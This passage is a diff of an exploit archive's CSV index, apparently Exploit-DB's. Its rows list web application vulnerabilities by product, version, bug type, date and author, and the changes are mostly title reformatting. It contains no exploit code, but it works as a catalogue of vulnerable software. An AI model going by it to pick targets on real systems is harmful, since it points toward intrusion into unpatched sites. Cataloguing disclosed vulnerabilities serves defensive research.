Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0 7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0 7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps,0 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps,0 @@ -20353,7 +20354,7 @@ id,file,description,date,author,platform,type,port 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps,0 7669,platforms/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0 -7672,platforms/php/webapps/7672.txt,"phpauctionsystem - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-05,x0r,php,webapps,0 +7672,platforms/php/webapps/7672.txt,"phpauctionsystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0 7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0 @@ -20782,7 +20783,7 @@ id,file,description,date,author,platform,type,port 8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 -8423,platforms/php/webapps/8423.txt,"Jamroom - 'index.php t' Local File Inclusion",2009-04-14,zxvf,php,webapps,0 +8423,platforms/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Parameter Local File Inclusion",2009-04-14,zxvf,php,webapps,0 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0 8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 @@ -23526,15 +23527,15 @@ id,file,description,date,author,platform,type,port 14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 -14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - (member.php) SQL Injection",2010-06-30,Dante90,php,webapps,0 +14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps,0 14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 14144,platforms/php/webapps/14144.txt,"Specialist Bed and Breakfast Website - SQL Injection",2010-06-30,JaMbA,php,webapps,0 14145,platforms/php/webapps/14145.txt,"Golf Club Site - SQL Injection",2010-06-30,JaMbA,php,webapps,0 14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution",2010-06-30,emgent,hardware,webapps,80 14147,platforms/php/webapps/14147.txt,"NinkoBB - Cross-Site Request Forgery",2010-07-01,"ADEO Security",php,webapps,0 14149,platforms/asp/webapps/14149.txt,"Setiran CMS - Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0 -14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - (post.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0 -14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - (forumdisplay.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0 +14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - 'post.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps,0 +14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps,0 14154,platforms/php/webapps/14154.txt,"Joomla! Component 'com_dateconverter' 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0 14209,platforms/php/webapps/14209.txt,"Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0 @@ -23941,7 +23942,7 @@ id,file,description,date,author,platform,type,port 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 - asearch.php SQL Injection",2010-09-29,"silent vapor",php,webapps,0 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net - static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps,0 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0 -15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0 +15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' Parameter SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0 15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0 15162,platforms/php/webapps/15162.rb,"Joomla! Component 'com_jejob' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0 15163,platforms/php/webapps/15163.rb,"Joomla! Component 'com_jedirectory' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0 @@ -23964,7 +23965,7 @@ id,file,description,date,author,platform,type,port 15204,platforms/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,php,webapps,0 15205,platforms/php/webapps/15205.txt,"Aspect Ratio CMS - Blind SQL Injection",2010-10-04,"Stephan Sattler",php,webapps,0 15207,platforms/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,php,webapps,0 -15208,platforms/php/webapps/15208.txt,"CuteNews - 'index.php?page' Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 +15208,platforms/php/webapps/15208.txt,"CuteNews - 'page' Parameter Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 15209,platforms/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",php,webapps,0 15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps,0 @@ -24787,7 +24788,7 @@ id,file,description,date,author,platform,type,port 17633,platforms/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0 17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 - Persistent Cross-Site Scripting",2011-08-08,v0nSch3lling,php,webapps,0 17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent Cross-Site Scripting",2011-08-09,Paulzz,php,webapps,0 -17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection (1)",2011-08-09,p0pc0rn,php,webapps,0 +17641,platforms/php/webapps/17641.txt,"LaserNet CMS 1.5 - SQL Injection (1)",2011-08-09,p0pc0rn,php,webapps,0 17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0 17646,platforms/php/webapps/17646.txt,"Joomla! Component 'com_esearch' - SQL Injection",2011-08-09,NoGe,php,webapps,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 @@ -25291,7 +25292,7 @@ id,file,description,date,author,platform,type,port 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 -18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 +18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php p Parameter' SQL Injection",2012-04-24,G13,php,webapps,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 18788,platforms/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 @@ -25882,7 +25883,7 @@ id,file,description,date,author,platform,type,port 21956,platforms/php/webapps/21956.txt,"KMMail 1.0 - E-Mail HTML Injection",2002-10-21,"Ulf Harnhammar",php,webapps,0 21957,platforms/php/webapps/21957.txt,"PHP Arena PAFileDB 1.1.3/2.1.1/3.0 - Email To Friend Cross-Site Scripting",2002-10-21,ersatz,php,webapps,0 21960,platforms/php/webapps/21960.txt,"gBook 1.4 - Administrative Access",2002-10-22,frog,php,webapps,0 -21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 - Form_Header.php Cross-Site Scripting",2002-10-23,qber66,php,webapps,0 +21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 - 'Form_Header.php' Cross-Site Scripting",2002-10-23,qber66,php,webapps,0 21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 - Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",cgi,webapps,0 21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x - NPH-MR.cgi File Disclosure",2002-10-28,pokleyzz,cgi,webapps,0 21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x - entete.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 @@ -26009,9 +26010,9 @@ id,file,description,date,author,platform,type,port 22277,platforms/php/webapps/22277.txt,"Nuked-klaN 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",php,webapps,0 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 - dev sendphoto.php File Disclosure",2003-02-24,frog,php,webapps,0 -22283,platforms/php/webapps/22283.txt,"CuteNews 0.88 - shownews.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 -22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - search.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 -22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 - comments.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 +22283,platforms/php/webapps/22283.txt,"CuteNews 0.88 - 'shownews.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 +22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - 'search.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 +22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 - 'comments.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22293,platforms/php/webapps/22293.txt,"E-theni - Remote File Inclusion Command Execution",2003-01-06,frog,php,webapps,0 22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 - ipchat.php Remote File Inclusion",2003-02-27,frog,php,webapps,0 22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 - showpic.php File Enumeration",2003-02-28,"Martin Eiszner",php,webapps,0 @@ -26306,8 +26307,6 @@ id,file,description,date,author,platform,type,port 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal",2003-09-01,"Zero X",cgi,webapps,0 -23097,platforms/php/webapps/23097.txt,"WebCalendar 0.9.x - colors.php color Cross-Site Scripting",2003-09-03,noconflic,php,webapps,0 -23098,platforms/php/webapps/23098.txt,"WebCalendar 0.9.x - week.php user Cross-Site Scripting",2003-09-03,noconflic,php,webapps,0 23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x - Multiple Module SQL Injection",2003-09-03,noconflic,php,webapps,0 23103,platforms/php/webapps/23103.txt,"Digital Scribe 1.x - Error Function Cross-Site Scripting",2003-09-05,Secunia,php,webapps,0 23105,platforms/php/webapps/23105.txt,"MyBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0 @@ -26789,9 +26788,9 @@ id,file,description,date,author,platform,type,port 24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps,0 24236,platforms/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script - Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",cgi,webapps,0 24237,platforms/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script - Full Path Disclosure",2004-06-28,DarkBicho,cgi,webapps,0 -24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - example1.php id Parameter Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 -24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - example2.php id Parameter Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 -24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 - show_archives.php id Parameter Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 +24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 +24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 +24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0 24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0 24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0 @@ -26855,7 +26854,7 @@ id,file,description,date,author,platform,type,port 24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - MapFrame.asp mapname Parameter Cross-Site Scripting",2004-07-15,anonymous,asp,webapps,0 24370,platforms/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 - Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,asp,webapps,0 24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Login Bypass",2004-07-15,anonymous,asp,webapps,0 -24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 - show_archives.php archive Parameter Cross-Site Scripting",2004-07-16,"Debasis Mohanty",php,webapps,0 +24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting",2004-07-16,"Debasis Mohanty",php,webapps,0 24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps,0 24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - Auth_Login.php SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0 24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - address.html Multiple Parameter Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 @@ -27121,7 +27120,7 @@ id,file,description,date,author,platform,type,port 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 - 'FileManager.php' Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQL Injections",2013-03-25,"Saadi Siddiqui",php,webapps,0 -24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - (gmembers.php gid Parameter) Blind SQL Injection",2013-03-25,Esac,php,webapps,0 +24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - 'gid' Parameter Blind SQL Injection",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0 24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 @@ -27263,7 +27262,7 @@ id,file,description,date,author,platform,type,port 25174,platforms/php/webapps/25174.txt,"PHPCOIN 1.2 - mod.php Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 25175,platforms/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - SendPM.php Directory Traversal",2005-03-01,Raven,php,webapps,0 -25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - x-forwarded-for Script Injection",2005-03-01,FraMe,php,webapps,0 +25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion",2005-03-01,mozako,php,webapps,0 @@ -28208,8 +28207,8 @@ id,file,description,date,author,platform,type,port 26461,platforms/cgi/webapps/26461.txt,"Simple PHP Blog 0.4 - preview_cgi.php Multiple Parameter Cross-Site Scripting",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26462,platforms/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 - preview_static_cgi.php Multiple Parameter Cross-Site Scripting",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26463,platforms/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - colors.php Multiple Parameter Cross-Site Scripting",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 -26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 - show_archives.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 -26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - show_news.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 +26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 +26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26467,platforms/php/webapps/26467.txt,"PHP Handicapper - Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - showgallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 @@ -28396,7 +28395,7 @@ id,file,description,date,author,platform,type,port 26687,platforms/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injections",2005-12-01,lwang,php,webapps,0 26688,platforms/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,php,webapps,0 26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 - Session.php SQL Injection",2005-12-01,Siegfried,php,webapps,0 -26691,platforms/php/webapps/26691.txt,"WebCalendar 1.0.1 - Layers_Toggle.php HTTP Response Splitting",2005-12-01,lwang,php,webapps,0 +26691,platforms/php/webapps/26691.txt,"WebCalendar 1.0.1 - 'Layers_Toggle.php' HTTP Response Splitting",2005-12-01,lwang,php,webapps,0 26692,platforms/php/webapps/26692.txt,"Extreme Corporate 6.0 - Extremesearch.php Cross-Site Scripting",2005-12-01,r0t,php,webapps,0 26693,platforms/php/webapps/26693.txt,"Edgewall Software Trac 0.9 Ticket Query Module - SQL Injection",2005-12-01,"David Maciejak",php,webapps,0 26694,platforms/php/webapps/26694.txt,"PHPMyChat 0.14.6 - start_page.css.php medium Parameter Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 @@ -28846,7 +28845,7 @@ id,file,description,date,author,platform,type,port 27249,platforms/php/webapps/27249.html,"PHP-Nuke 7.x - CAPTCHA Bypass",2006-02-18,waraxe,php,webapps,0 27250,platforms/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 - edituser.php Access Validation",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 27251,platforms/php/webapps/27251.txt,"Magic Calendar Lite 1.02 - 'index.php' SQL Injection",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 -27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 - show_news.php Cross-Site Scripting",2006-02-20,imei,php,webapps,0 +27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 - 'show_news.php' Cross-Site Scripting",2006-02-20,imei,php,webapps,0 27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 @@ -29053,7 +29052,7 @@ id,file,description,date,author,platform,type,port 27531,platforms/php/webapps/27531.txt,"WordPress Plugin Hms Testimonials 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla! Component 'com_redshop' 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery - 'index.php' Remote File Inclusion",2006-03-30,"Morocco Security Team",php,webapps,0 -27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - post.php SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 +27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - 'post.php' SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - searchresults.asp Cross-Site Scripting",2006-03-31,r0t,asp,webapps,0 27537,platforms/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c - 'index.php' Remote File Inclusion",2006-03-31,botan,php,webapps,0 27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 - profile.php u Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29999,7 +29998,7 @@ id,file,description,date,author,platform,type,port 28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 - db/PollDB.php CONFIG_DATAREADERWRITER Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 - fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 - fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28875,platforms/php/webapps/28875.txt,"Freenews 1.1 - Aff_News.php Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 +28875,platforms/php/webapps/28875.txt,"Freenews 1.1 - 'Aff_News.php' Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php' 'Username' Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0 28881,platforms/php/webapps/28881.txt,"Foresite CMS - Index_2.php Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0 @@ -30069,7 +30068,7 @@ id,file,description,date,author,platform,type,port 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 28959,platforms/php/webapps/28959.txt,"WordPress Plugin Cart66 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 -29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - activenews_view.asp articleId Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 @@ -30173,10 +30172,10 @@ id,file,description,date,author,platform,type,port 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - login_form.asp msg Parameter Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0 29085,platforms/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - product.asp ProductID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - default.asp page Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - activenews_search.asp query Parameter Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0 -29089,platforms/asp/webapps/29089.txt,"Active News Manager - activeNews_categories.asp catID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29090,platforms/asp/webapps/29090.txt,"Active News Manager - activeNews_comments.asp articleId Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - 'page' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Parameter Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0 